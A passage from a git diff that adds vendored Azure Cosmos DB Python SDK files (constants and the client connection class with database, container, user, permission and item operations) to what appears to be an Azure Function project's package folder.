validate_cache_staleness_value(max_integrated_cache_staleness): + int(max_integrated_cache_staleness) # Will throw error if data type cant be converted to int + if max_integrated_cache_staleness <= 0: + raise ValueError("Parameter 'max_integrated_cache_staleness_in_ms' can only be a positive integer.") diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_constants.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_constants.py new file mode 100644 index 0000000..e6d8f27 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_constants.py @@ -0,0 +1,40 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Class for defining internal constants in the Azure Cosmos database service. +""" + + +class _Constants(object): + """Constants used in the azure-cosmos package""" + + UserConsistencyPolicy = "userConsistencyPolicy" + DefaultConsistencyLevel = "defaultConsistencyLevel" + + # GlobalDB related constants + WritableLocations = "writableLocations" + ReadableLocations = "readableLocations" + Name = "name" + DatabaseAccountEndpoint = "databaseAccountEndpoint" + DefaultUnavailableLocationExpirationTime = 5 * 60 * 1000 + + # ServiceDocument Resource + EnableMultipleWritableLocations = "enableMultipleWriteLocations" diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_cosmos_client_connection.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_cosmos_client_connection.py new file mode 100644 index 0000000..ee1649e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_cosmos_client_connection.py @@ -0,0 +1,2625 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +# disable (too-many-lines) check +# pylint: disable=C0302 + +"""Document client class for the Azure Cosmos database service. +""" +# https://github.com/PyCQA/pylint/issues/3112 +# Currently pylint is locked to 2.3.3 and this is fixed in 2.4.4 +from typing import Dict, Any, Optional, TypeVar # pylint: disable=unused-import +import urllib.parse +from urllib3.util.retry import Retry +from azure.core.paging import ItemPaged # type: ignore +from azure.core import PipelineClient # type: ignore +from azure.core.exceptions import raise_with_traceback # type: ignore +from azure.core.pipeline.policies import ( # type: ignore + HTTPPolicy, + ContentDecodePolicy, + HeadersPolicy, + UserAgentPolicy, + NetworkTraceLoggingPolicy, + CustomHookPolicy, + DistributedTracingPolicy, + HttpLoggingPolicy, + ProxyPolicy) + +from . import _base as base +from . import documents +from .documents import ConnectionPolicy +from . import _constants as constants +from . import http_constants +from . import _query_iterable as query_iterable +from . import _runtime_constants as runtime_constants +from . import _request_object +from . import _synchronized_request as synchronized_request +from . import _global_endpoint_manager as global_endpoint_manager +from ._routing import routing_map_provider +from ._retry_utility import ConnectionRetryPolicy +from . import _session +from . import _utils +from .partition_key import _Undefined, _Empty +from ._auth_policy import CosmosBearerTokenCredentialPolicy + +ClassType = TypeVar("ClassType") +# pylint: disable=protected-access + + +class CosmosClientConnection(object): # pylint: disable=too-many-public-methods,too-many-instance-attributes + """Represents a document client. + + Provides a client-side logical representation of the Azure Cosmos + service. This client is used to configure and execute requests against the + service. + + The service client encapsulates the endpoint and credentials used to access + the Azure Cosmos service. + """ + + class _QueryCompatibilityMode: + Default = 0 + Query = 1 + SqlQuery = 2 + + # default number precisions + _DefaultNumberHashPrecision = 3 + _DefaultNumberRangePrecision = -1 + + # default string precision + _DefaultStringHashPrecision = 3 + _DefaultStringRangePrecision = -1 + + def __init__( + self, + url_connection, # type: str + auth, # type: Dict[str, Any] + connection_policy=None, # type: Optional[ConnectionPolicy] + consistency_level=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> None + """ + :param str url_connection: + The URL for connecting to the DB server. + :param dict auth: + Contains 'masterKey' or 'resourceTokens', where + auth['masterKey'] is the default authorization key to use to + create the client, and auth['resourceTokens'] is the alternative + authorization key. + :param documents.ConnectionPolicy connection_policy: + The connection policy for the client. + :param documents.ConsistencyLevel consistency_level: + The default consistency policy for client operations. + + """ + self.url_connection = url_connection + + self.master_key = None + self.resource_tokens = None + self.aad_credentials = None + if auth is not None: + self.master_key = auth.get("masterKey") + self.resource_tokens = auth.get("resourceTokens") + self.aad_credentials = auth.get("clientSecretCredential") + + if auth.get("permissionFeed"): + self.resource_tokens = {} + for permission_feed in auth["permissionFeed"]: + resource_parts = permission_feed["resource"].split("/") + id_ = resource_parts[-1] + self.resource_tokens[id_] = permission_feed["_token"] + + self.connection_policy = connection_policy or ConnectionPolicy() + + self.partition_resolvers = {} # type: Dict[str, Any] + + self.partition_key_definition_cache = {} # type: Dict[str, Any] + + self.default_headers = { + http_constants.HttpHeaders.CacheControl: "no-cache", + http_constants.HttpHeaders.Version: http_constants.Versions.CurrentVersion, + # For single partition query with aggregate functions we would try to accumulate the results on the SDK. + # We need to set continuation as not expected. + http_constants.HttpHeaders.IsContinuationExpected: False, + } + + # Keeps the latest response headers from the server. + self.last_response_headers = None + + self._useMultipleWriteLocations = False + self._global_endpoint_manager = global_endpoint_manager._GlobalEndpointManager(self) + + retry_policy = None + if isinstance(self.connection_policy.ConnectionRetryConfiguration, HTTPPolicy): + retry_policy = self.connection_policy.ConnectionRetryConfiguration + elif isinstance(self.connection_policy.ConnectionRetryConfiguration, int): + retry_policy = ConnectionRetryPolicy(total=self.connection_policy.ConnectionRetryConfiguration) + elif isinstance(self.connection_policy.ConnectionRetryConfiguration, Retry): + # Convert a urllib3 retry policy to a Pipeline policy + retry_policy = ConnectionRetryPolicy( + retry_total=self.connection_policy.ConnectionRetryConfiguration.total, + retry_connect=self.connection_policy.ConnectionRetryConfiguration.connect, + retry_read=self.connection_policy.ConnectionRetryConfiguration.read, + retry_status=self.connection_policy.ConnectionRetryConfiguration.status, + retry_backoff_max=self.connection_policy.ConnectionRetryConfiguration.BACKOFF_MAX, + retry_on_status_codes=list(self.connection_policy.ConnectionRetryConfiguration.status_forcelist), + retry_backoff_factor=self.connection_policy.ConnectionRetryConfiguration.backoff_factor + ) + else: + raise TypeError( + "Unsupported retry policy. Must be an azure.cosmos.ConnectionRetryPolicy, int, or urllib3.Retry") + + proxies = kwargs.pop('proxies', {}) + if self.connection_policy.ProxyConfiguration and self.connection_policy.ProxyConfiguration.Host: + host = self.connection_policy.ProxyConfiguration.Host + url = urllib.parse.urlparse(host) + proxy = host if url.port else host + ":" + str(self.connection_policy.ProxyConfiguration.Port) + proxies.update({url.scheme: proxy}) + + self._user_agent = _utils.get_user_agent() + + credentials_policy = None + if self.aad_credentials: + scopes = base.create_scope_from_url(self.url_connection) + credentials_policy = CosmosBearerTokenCredentialPolicy(self.aad_credentials, scopes) + + policies = [ + HeadersPolicy(**kwargs), + ProxyPolicy(proxies=proxies), + UserAgentPolicy(base_user_agent=self._user_agent, **kwargs), + ContentDecodePolicy(), + retry_policy, + credentials_policy, + CustomHookPolicy(**kwargs), + NetworkTraceLoggingPolicy(**kwargs), + DistributedTracingPolicy(**kwargs), + HttpLoggingPolicy(**kwargs), + ] + + transport = kwargs.pop("transport", None) + self.pipeline_client = PipelineClient(base_url=url_connection, transport=transport, policies=policies) + + # Query compatibility mode. + # Allows to specify compatibility mode used by client when making query requests. Should be removed when + # application/sql is no longer supported. + self._query_compatibility_mode = CosmosClientConnection._QueryCompatibilityMode.Default + + # Routing map provider + self._routing_map_provider = routing_map_provider.SmartRoutingMapProvider(self) + + database_account = self._global_endpoint_manager._GetDatabaseAccount(**kwargs) + self._global_endpoint_manager.force_refresh(database_account) + + # Use database_account if no consistency passed in to verify consistency level to be used + self._set_client_consistency_level(database_account, consistency_level) + + def _set_client_consistency_level( + self, + database_account: ClassType, + consistency_level: Optional[str], + ) -> None: + """Checks if consistency level param was passed in by user and sets it to that value or to the account default. + + :param database_account: The database account to be used to check consistency levels + :type database_account: ~azure.cosmos.documents.DatabaseAccount + :param consistency_level: The consistency level passed in by the user + :type consistency_level: Optional[str] + :rtype: None + """ + if consistency_level is None: + # Set to default level present in account + user_consistency_policy = database_account.ConsistencyPolicy + consistency_level = user_consistency_policy.get(constants._Constants.DefaultConsistencyLevel) + else: + # Set consistency level header to be used for the client + self.default_headers[http_constants.HttpHeaders.ConsistencyLevel] = consistency_level + + if consistency_level == documents.ConsistencyLevel.Session: + # create a session - this is maintained only if the default consistency level + # on the client is set to session, or if the user explicitly sets it as a property + # via setter + self.default_headers[http_constants.HttpHeaders.ConsistencyLevel] = consistency_level + self.session = _session.Session(self.url_connection) + else: + self.session = None # type: ignore + + @property + def Session(self): + """Gets the session object from the client. """ + return self.session + + @Session.setter + def Session(self, session): + """Sets a session object on the document client. + + This will override the existing session + """ + self.session = session + + @property + def WriteEndpoint(self): + """Gets the curent write endpoint for a geo-replicated database account. + """ + return self._global_endpoint_manager.get_write_endpoint() + + @property + def ReadEndpoint(self): + """Gets the curent read endpoint for a geo-replicated database account. + """ + return self._global_endpoint_manager.get_read_endpoint() + + def RegisterPartitionResolver(self, database_link, partition_resolver): + """Registers the partition resolver associated with the database link + + :param str database_link: + Database Self Link or ID based link. + :param object partition_resolver: + An instance of PartitionResolver. + + """ + if not database_link: + raise ValueError("database_link is None or empty.") + + if partition_resolver is None: + raise ValueError("partition_resolver is None.") + + self.partition_resolvers = {base.TrimBeginningAndEndingSlashes(database_link): partition_resolver} + + def GetPartitionResolver(self, database_link): + """Gets the partition resolver associated with the database link + + :param str database_link: + Database self link or ID based link. + + :return: + An instance of PartitionResolver. + :rtype: object + + """ + if not database_link: + raise ValueError("database_link is None or empty.") + + return self.partition_resolvers.get(base.TrimBeginningAndEndingSlashes(database_link)) + + def CreateDatabase(self, database, options=None, **kwargs): + """Creates a database. + + :param dict database: + The Azure Cosmos database to create. + :param dict options: + The request options for the request. + + :return: + The Database that was created. + :rtype: dict + + """ + if options is None: + options = {} + + CosmosClientConnection.__ValidateResource(database) + path = "/dbs" + return self.Create(database, path, "dbs", None, None, options, **kwargs) + + def ReadDatabase(self, database_link, options=None, **kwargs): + """Reads a database. + + :param str database_link: + The link to the database. + :param dict options: + The request options for the request. + + :return: + The Database that was read. + :rtype: dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(database_link) + database_id = base.GetResourceIdOrFullNameFromLink(database_link) + return self.Read(path, "dbs", database_id, None, options, **kwargs) + + def ReadDatabases(self, options=None, **kwargs): + """Reads all databases. + + :param dict options: + The request options for the request. + + :return: + Query Iterable of Databases. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + return self.QueryDatabases(None, options, **kwargs) + + def QueryDatabases(self, query, options=None, **kwargs): + """Queries databases. + + :param (str or dict) query: + :param dict options: + The request options for the request. + + :return: Query Iterable of Databases. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + def fetch_fn(options): + return ( + self.__QueryFeed( + "/dbs", "dbs", "", lambda r: r["Databases"], + lambda _, b: b, query, options, **kwargs + ), + self.last_response_headers, + ) + + return ItemPaged( + self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable + ) + + def ReadContainers(self, database_link, options=None, **kwargs): + """Reads all collections in a database. + + :param str database_link: + The link to the database. + :param dict options: + The request options for the request. + + :return: Query Iterable of Collections. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + return self.QueryContainers(database_link, None, options, **kwargs) + + def QueryContainers(self, database_link, query, options=None, **kwargs): + """Queries collections in a database. + + :param str database_link: + The link to the database. + :param (str or dict) query: + :param dict options: + The request options for the request. + + :return: Query Iterable of Collections. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(database_link, "colls") + database_id = base.GetResourceIdOrFullNameFromLink(database_link) + + def fetch_fn(options): + return ( + self.__QueryFeed( + path, "colls", database_id, lambda r: r["DocumentCollections"], + lambda _, body: body, query, options, **kwargs + ), + self.last_response_headers, + ) + + return ItemPaged( + self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable + ) + + def CreateContainer(self, database_link, collection, options=None, **kwargs): + """Creates a collection in a database. + + :param str database_link: + The link to the database. + :param dict collection: + The Azure Cosmos collection to create. + :param dict options: + The request options for the request. + + :return: The Collection that was created. + :rtype: dict + + """ + if options is None: + options = {} + + CosmosClientConnection.__ValidateResource(collection) + path = base.GetPathFromLink(database_link, "colls") + database_id = base.GetResourceIdOrFullNameFromLink(database_link) + return self.Create(collection, path, "colls", database_id, None, options, **kwargs) + + def ReplaceContainer(self, collection_link, collection, options=None, **kwargs): + """Replaces a collection and return it. + + :param str collection_link: + The link to the collection entity. + :param dict collection: + The collection to be used. + :param dict options: + The request options for the request. + + :return: + The new Collection. + :rtype: + dict + + """ + if options is None: + options = {} + + CosmosClientConnection.__ValidateResource(collection) + path = base.GetPathFromLink(collection_link) + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + return self.Replace(collection, path, "colls", collection_id, None, options, **kwargs) + + def ReadContainer(self, collection_link, options=None, **kwargs): + """Reads a collection. + + :param str collection_link: + The link to the document collection. + :param dict options: + The request options for the request. + + :return: + The read Collection. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(collection_link) + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + return self.Read(path, "colls", collection_id, None, options, **kwargs) + + def CreateUser(self, database_link, user, options=None, **kwargs): + """Creates a user. + + :param str database_link: + The link to the database. + :param dict user: + The Azure Cosmos user to create. + :param dict options: + The request options for the request. + + :return: + The created User. + :rtype: + dict + + """ + if options is None: + options = {} + + database_id, path = self._GetDatabaseIdWithPathForUser(database_link, user) + return self.Create(user, path, "users", database_id, None, options, **kwargs) + + def UpsertUser(self, database_link, user, options=None, **kwargs): + """Upserts a user. + + :param str database_link: + The link to the database. + :param dict user: + The Azure Cosmos user to upsert. + :param dict options: + The request options for the request. + + :return: + The upserted User. + :rtype: dict + """ + if options is None: + options = {} + + database_id, path = self._GetDatabaseIdWithPathForUser(database_link, user) + return self.Upsert(user, path, "users", database_id, None, options, **kwargs) + + def _GetDatabaseIdWithPathForUser(self, database_link, user): # pylint: disable=no-self-use + CosmosClientConnection.__ValidateResource(user) + path = base.GetPathFromLink(database_link, "users") + database_id = base.GetResourceIdOrFullNameFromLink(database_link) + return database_id, path + + def ReadUser(self, user_link, options=None, **kwargs): + """Reads a user. + + :param str user_link: + The link to the user entity. + :param dict options: + The request options for the request. + + :return: + The read User. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(user_link) + user_id = base.GetResourceIdOrFullNameFromLink(user_link) + return self.Read(path, "users", user_id, None, options, **kwargs) + + def ReadUsers(self, database_link, options=None, **kwargs): + """Reads all users in a database. + + :params str database_link: + The link to the database. + :params dict options: + The request options for the request. + :return: + Query iterable of Users. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + return self.QueryUsers(database_link, None, options, **kwargs) + + def QueryUsers(self, database_link, query, options=None, **kwargs): + """Queries users in a database. + + :param str database_link: + The link to the database. + :param (str or dict) query: + :param dict options: + The request options for the request. + + :return: + Query Iterable of Users. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(database_link, "users") + database_id = base.GetResourceIdOrFullNameFromLink(database_link) + + def fetch_fn(options): + return ( + self.__QueryFeed( + path, "users", database_id, lambda r: r["Users"], + lambda _, b: b, query, options, **kwargs + ), + self.last_response_headers, + ) + + return ItemPaged( + self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable + ) + + def DeleteDatabase(self, database_link, options=None, **kwargs): + """Deletes a database. + + :param str database_link: + The link to the database. + :param dict options: + The request options for the request. + + :return: + The deleted Database. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(database_link) + database_id = base.GetResourceIdOrFullNameFromLink(database_link) + return self.DeleteResource(path, "dbs", database_id, None, options, **kwargs) + + def CreatePermission(self, user_link, permission, options=None, **kwargs): + """Creates a permission for a user. + + :param str user_link: + The link to the user entity. + :param dict permission: + The Azure Cosmos user permission to create. + :param dict options: + The request options for the request. + + :return: + The created Permission. + :rtype: + dict + + """ + if options is None: + options = {} + + path, user_id = self._GetUserIdWithPathForPermission(permission, user_link) + return self.Create(permission, path, "permissions", user_id, None, options, **kwargs) + + def UpsertPermission(self, user_link, permission, options=None, **kwargs): + """Upserts a permission for a user. + + :param str user_link: + The link to the user entity. + :param dict permission: + The Azure Cosmos user permission to upsert. + :param dict options: + The request options for the request. + + :return: + The upserted permission. + :rtype: + dict + + """ + if options is None: + options = {} + + path, user_id = self._GetUserIdWithPathForPermission(permission, user_link) + return self.Upsert(permission, path, "permissions", user_id, None, options, **kwargs) + + def _GetUserIdWithPathForPermission(self, permission, user_link): # pylint: disable=no-self-use + CosmosClientConnection.__ValidateResource(permission) + path = base.GetPathFromLink(user_link, "permissions") + user_id = base.GetResourceIdOrFullNameFromLink(user_link) + return path, user_id + + def ReadPermission(self, permission_link, options=None, **kwargs): + """Reads a permission. + + :param str permission_link: + The link to the permission. + :param dict options: + The request options for the request. + + :return: + The read permission. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(permission_link) + permission_id = base.GetResourceIdOrFullNameFromLink(permission_link) + return self.Read(path, "permissions", permission_id, None, options, **kwargs) + + def ReadPermissions(self, user_link, options=None, **kwargs): + """Reads all permissions for a user. + + :param str user_link: + The link to the user entity. + :param dict options: + The request options for the request. + + :return: + Query Iterable of Permissions. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + return self.QueryPermissions(user_link, None, options, **kwargs) + + def QueryPermissions(self, user_link, query, options=None, **kwargs): + """Queries permissions for a user. + + :param str user_link: + The link to the user entity. + :param (str or dict) query: + :param dict options: + The request options for the request. + + :return: + Query Iterable of Permissions. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(user_link, "permissions") + user_id = base.GetResourceIdOrFullNameFromLink(user_link) + + def fetch_fn(options): + return ( + self.__QueryFeed( + path, "permissions", user_id, lambda r: r["Permissions"], lambda _, b: b, query, options, **kwargs + ), + self.last_response_headers, + ) + + return ItemPaged( + self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable + ) + + def ReplaceUser(self, user_link, user, options=None, **kwargs): + """Replaces a user and return it. + + :param str user_link: + The link to the user entity. + :param dict user: + :param dict options: + The request options for the request. + + :return: + The new User. + :rtype: + dict + + """ + if options is None: + options = {} + + CosmosClientConnection.__ValidateResource(user) + path = base.GetPathFromLink(user_link) + user_id = base.GetResourceIdOrFullNameFromLink(user_link) + return self.Replace(user, path, "users", user_id, None, options, **kwargs) + + def DeleteUser(self, user_link, options=None, **kwargs): + """Deletes a user. + + :param str user_link: + The link to the user entity. + :param dict options: + The request options for the request. + + :return: + The deleted user. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(user_link) + user_id = base.GetResourceIdOrFullNameFromLink(user_link) + return self.DeleteResource(path, "users", user_id, None, options, **kwargs) + + def ReplacePermission(self, permission_link, permission, options=None, **kwargs): + """Replaces a permission and return it. + + :param str permission_link: + The link to the permission. + :param dict permission: + :param dict options: + The request options for the request. + + :return: + The new Permission. + :rtype: + dict + + """ + if options is None: + options = {} + + CosmosClientConnection.__ValidateResource(permission) + path = base.GetPathFromLink(permission_link) + permission_id = base.GetResourceIdOrFullNameFromLink(permission_link) + return self.Replace(permission, path, "permissions", permission_id, None, options, **kwargs) + + def DeletePermission(self, permission_link, options=None, **kwargs): + """Deletes a permission. + + :param str permission_link: + The link to the permission. + :param dict options: + The request options for the request. + + :return: + The deleted Permission. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(permission_link) + permission_id = base.GetResourceIdOrFullNameFromLink(permission_link) + return self.DeleteResource(path, "permissions", permission_id, None, options, **kwargs) + + def ReadItems(self, collection_link, feed_options=None, response_hook=None, **kwargs): + """Reads all documents in a collection. + + :param str collection_link: + The link to the document collection. + :param dict feed_options: + + :return: + Query Iterable of Documents. + :rtype: + query_iterable.QueryIterable + + """ + if feed_options is None: + feed_options = {} + + return self.QueryItems(collection_link, None, feed_options, response_hook=response_hook, **kwargs) + + def QueryItems( + self, + database_or_container_link, + query, + options=None, + partition_key=None, + response_hook=None, + **kwargs + ): + """Queries documents in a collection. + + :param str database_or_container_link: + The link to the database when using partitioning, otherwise link to the document collection. + :param (str or dict) query: + :param dict options: + The request options for the request. + :param str partition_key: + Partition key for the query(default value None) + :param response_hook: + A callable invoked with the response metadata + + :return: + Query Iterable of Documents. + :rtype: + query_iterable.QueryIterable + + """ + database_or_container_link = base.TrimBeginningAndEndingSlashes(database_or_container_link) + + if options is None: + options = {} + + if base.IsDatabaseLink(database_or_container_link): + return ItemPaged( + self, + query, + options, + database_link=database_or_container_link, + partition_key=partition_key, + page_iterator_class=query_iterable.QueryIterable + ) + + path = base.GetPathFromLink(database_or_container_link, "docs") + collection_id = base.GetResourceIdOrFullNameFromLink(database_or_container_link) + + def fetch_fn(options): + return ( + self.__QueryFeed( + path, + "docs", + collection_id, + lambda r: r["Documents"], + lambda _, b: b, + query, + options, + response_hook=response_hook, + **kwargs + ), + self.last_response_headers, + ) + + return ItemPaged( + self, + query, + options, + fetch_function=fetch_fn, + collection_link=database_or_container_link, + page_iterator_class=query_iterable.QueryIterable + ) + + def QueryItemsChangeFeed(self, collection_link, options=None, response_hook=None, **kwargs): + """Queries documents change feed in a collection. + + :param str collection_link: + The link to the document collection. + :param dict options: + The request options for the request. + options may also specify partition key range id. + :param response_hook: + A callable invoked with the response metadata + + :return: + Query Iterable of Documents. + :rtype: + query_iterable.QueryIterable + + """ + + partition_key_range_id = None + if options is not None and "partitionKeyRangeId" in options: + partition_key_range_id = options["partitionKeyRangeId"] + + return self._QueryChangeFeed( + collection_link, "Documents", options, partition_key_range_id, response_hook=response_hook, **kwargs + ) + + def _QueryChangeFeed( + self, collection_link, resource_type, options=None, partition_key_range_id=None, response_hook=None, + **kwargs + ): + """Queries change feed of a resource in a collection. + + :param str collection_link: + The link to the document collection. + :param str resource_type: + The type of the resource. + :param dict options: + The request options for the request. + :param str partition_key_range_id: + Specifies partition key range id. + :param response_hook: + A callable invoked with the response metadata + + :return: + Query Iterable of Documents. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + options["changeFeed"] = True + + resource_key_map = {"Documents": "docs"} + + # For now, change feed only supports Documents and Partition Key Range resouce type + if resource_type not in resource_key_map: + raise NotImplementedError(resource_type + " change feed query is not supported.") + + resource_key = resource_key_map[resource_type] + path = base.GetPathFromLink(collection_link, resource_key) + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + + def fetch_fn(options): + return ( + self.__QueryFeed( + path, + resource_key, + collection_id, + lambda r: r[resource_type], + lambda _, b: b, + None, + options, + partition_key_range_id, + response_hook=response_hook, + **kwargs + ), + self.last_response_headers, + ) + + return ItemPaged( + self, + None, + options, + fetch_function=fetch_fn, + collection_link=collection_link, + page_iterator_class=query_iterable.QueryIterable + ) + + def _ReadPartitionKeyRanges(self, collection_link, feed_options=None, **kwargs): + """Reads Partition Key Ranges. + + :param str collection_link: + The link to the document collection. + :param dict feed_options: + + :return: + Query Iterable of PartitionKeyRanges. + :rtype: + query_iterable.QueryIterable + + """ + if feed_options is None: + feed_options = {} + + return self._QueryPartitionKeyRanges(collection_link, None, feed_options, **kwargs) + + def _QueryPartitionKeyRanges(self, collection_link, query, options=None, **kwargs): + """Queries Partition Key Ranges in a collection. + + :param str collection_link: + The link to the document collection. + :param (str or dict) query: + :param dict options: + The request options for the request. + + :return: + Query Iterable of PartitionKeyRanges. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(collection_link, "pkranges") + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + + def fetch_fn(options): + return ( + self.__QueryFeed( + path, "pkranges", collection_id, lambda r: r["PartitionKeyRanges"], + lambda _, b: b, query, options, **kwargs + ), + self.last_response_headers, + ) + + return ItemPaged( + self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable + ) + + def CreateItem(self, database_or_container_link, document, options=None, **kwargs): + """Creates a document in a collection. + + :param str database_or_container_link: + The link to the database when using partitioning, otherwise link to the document collection. + :param dict document: + The Azure Cosmos document to create. + :param dict options: + The request options for the request. + :param bool options['disableAutomaticIdGeneration']: + Disables the automatic id generation. If id is missing in the body and this + option is true, an error will be returned. + + :return: + The created Document. + :rtype: + dict + + """ + # Python's default arguments are evaluated once when the function is defined, + # not each time the function is called (like it is in say, Ruby). This means + # that if you use a mutable default argument and mutate it, you will and have + # mutated that object for all future calls to the function as well. So, using + # a non-mutable default in this case(None) and assigning an empty dict(mutable) + # inside the method For more details on this gotcha, please refer + # http://docs.python-guide.org/en/latest/writing/gotchas/ + if options is None: + options = {} + + # We check the link to be document collection link since it can be database + # link in case of client side partitioning + collection_id, document, path = self._GetContainerIdWithPathForItem( + database_or_container_link, document, options + ) + + if base.IsItemContainerLink(database_or_container_link): + options = self._AddPartitionKey(database_or_container_link, document, options) + + return self.Create(document, path, "docs", collection_id, None, options, **kwargs) + + def UpsertItem(self, database_or_container_link, document, options=None, **kwargs): + """Upserts a document in a collection. + + :param str database_or_container_link: + The link to the database when using partitioning, otherwise link to the document collection. + :param dict document: + The Azure Cosmos document to upsert. + :param dict options: + The request options for the request. + :param bool options['disableAutomaticIdGeneration']: + Disables the automatic id generation. If id is missing in the body and this + option is true, an error will be returned. + + :return: + The upserted Document. + :rtype: + dict + + """ + # Python's default arguments are evaluated once when the function is defined, + # not each time the function is called (like it is in say, Ruby). This means + # that if you use a mutable default argument and mutate it, you will and have + # mutated that object for all future calls to the function as well. So, using + # a non-mutable deafult in this case(None) and assigning an empty dict(mutable) + # inside the method For more details on this gotcha, please refer + # http://docs.python-guide.org/en/latest/writing/gotchas/ + if options is None: + options = {} + + # We check the link to be document collection link since it can be database + # link in case of client side partitioning + if base.IsItemContainerLink(database_or_container_link): + options = self._AddPartitionKey(database_or_container_link, document, options) + + collection_id, document, path = self._GetContainerIdWithPathForItem( + database_or_container_link, document, options + ) + return self.Upsert(document, path, "docs", collection_id, None, options, **kwargs) + + PartitionResolverErrorMessage = ( + "Couldn't find any partition resolvers for the database link provided. " + + "Ensure that the link you used when registering the partition resolvers " + + "matches the link provided or you need to register both types of database " + + "link(self link as well as ID based link)." + ) + + # Gets the collection id and path for the document + def _GetContainerIdWithPathForItem(self, database_or_container_link, document, options): + + if not database_or_container_link: + raise ValueError("database_or_container_link is None or empty.") + + if document is None: + raise ValueError("document is None.") + + CosmosClientConnection.__ValidateResource(document) + document = document.copy() + if not document.get("id") and not options.get("disableAutomaticIdGeneration"): + document["id"] = base.GenerateGuidId() + + collection_link = database_or_container_link + + if base.IsDatabaseLink(database_or_container_link): + partition_resolver = self.GetPartitionResolver(database_or_container_link) + + if partition_resolver is not None: + collection_link = partition_resolver.ResolveForCreate(document) + else: + raise ValueError(CosmosClientConnection.PartitionResolverErrorMessage) + + path = base.GetPathFromLink(collection_link, "docs") + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + return collection_id, document, path + + def ReadItem(self, document_link, options=None, **kwargs): + """Reads a document. + + :param str document_link: + The link to the document. + :param dict options: + The request options for the request. + + :return: + The read Document. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(document_link) + document_id = base.GetResourceIdOrFullNameFromLink(document_link) + return self.Read(path, "docs", document_id, None, options, **kwargs) + + def ReadTriggers(self, collection_link, options=None, **kwargs): + """Reads all triggers in a collection. + + :param str collection_link: + The link to the document collection. + :param dict options: + The request options for the request. + + :return: + Query Iterable of Triggers. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + return self.QueryTriggers(collection_link, None, options, 